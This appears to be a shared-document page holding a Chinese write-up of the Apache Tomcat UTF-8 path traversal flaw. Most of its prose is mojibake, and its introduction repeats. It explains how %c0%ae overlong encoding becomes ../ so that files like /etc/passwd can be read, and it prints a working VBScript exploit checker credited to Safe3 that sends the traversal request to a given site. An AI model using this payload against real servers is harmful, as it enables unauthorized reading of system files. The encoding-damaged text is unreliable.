Apache Tomcat UTF-8编码漏洞Apache Tomcat UTF-8编码漏洞
Apache Tomcat UTF-8?àÂëÂ???
ºÇºÇ??Apache Tomcat?öÁËÒ??öÀàËƵ?ÄêIIS url
?àÂëµÄÂ??????ÈÈ?CVEÒÑ?,ÒÑ?,????ÁË??ÎÒÒ?À???Ò?ÏÂ?É??
Â?????ÉúÔÚApache
Tomcat??ÀíUTF-8?àÂëÊ???Ã?ÓÐÕýÈ?ת?????Ó?øµ?ÖÂÔÚ??Àí?üº?%c0%ae%c0%a
eµÄurlÊ?ת??ΪÀàËÆ../µÄÐ...
Apache Tomcat UTF-8编码漏洞
Apache Tomcat UTF-8?àÂëÂ???
ºÇºÇ??Apache Tomcat?öÁËÒ??öÀàËƵ?ÄêIIS url
?àÂëµÄÂ??????ÈÈ?CVEÒÑ?,ÒÑ?,????ÁË??ÎÒÒ?À???Ò?ÏÂ?É??
Â?????ÉúÔÚApache
Tomcat??ÀíUTF-8?àÂëÊ???Ã?ÓÐÕýÈ?ת?????Ó?øµ?ÖÂÔÚ??Àí?üº?%c0%ae%c0%a
eµÄurlÊ?ת??ΪÀàËÆ../µÄÐÎÊ???Ê?µÃ?ÉÒÔ?éÀúϵÍ?ÈÎÒâÎÄ?þ???üÀ?
/etc/passwdµÈ
????µÄÌõ?þΪApache TomcatµÄÅäÖÃÎÄ?þcontext.xml ?ò server.xml µÄ'allowLinking' ºÍ 'URIencoding' ÔÊÐí'UTF-8'Ñ?Ïî
Â????âÊÔ?úÂëÈçÏÂ?º
Dim strUrl,strSite
showB()
Set Args = Wscript.Arguments
If Args.Count <> 1 Then
ShowU()
Else
strSite=Args(0)
End If
strUrl="/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/foo/bar"
Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET",strSite & strUrl, False
objXML.SetRequestHeader "Referer", strSite
objXML.send()
if objXML.status=200 then
wscript.echo("?æÔÚÂ???")
end if
Sub showB()
With Wscript
.Echo("+--------------------------=====================-----------
-------------------+")
.Echo("Exploit Apache Tomcat UTF-8")
.Echo("Code By Safe3")
.Echo("+--------------------------=====================------------------------------+")
End with
End Sub
Sub showU()
With Wscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("ÓÃ??:")
.Echo(" cscript "&.ScriptName&" site")
.Echo("Àý×Ó:")
.Echo(" cscript "&.ScriptName&" >result.txt") .Echo("+--------------------------=====================------------------------------+")
.Quit
End with
End Sub
本文档为【Apache Tomcat UTF-8编码漏洞】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑,
图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
该文档来自用户分享,如有侵权行为请发邮件ishare@vip.sina.com联系网站客服,我们会及时删除。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。
本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。
网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
浙公网安备 33021202002483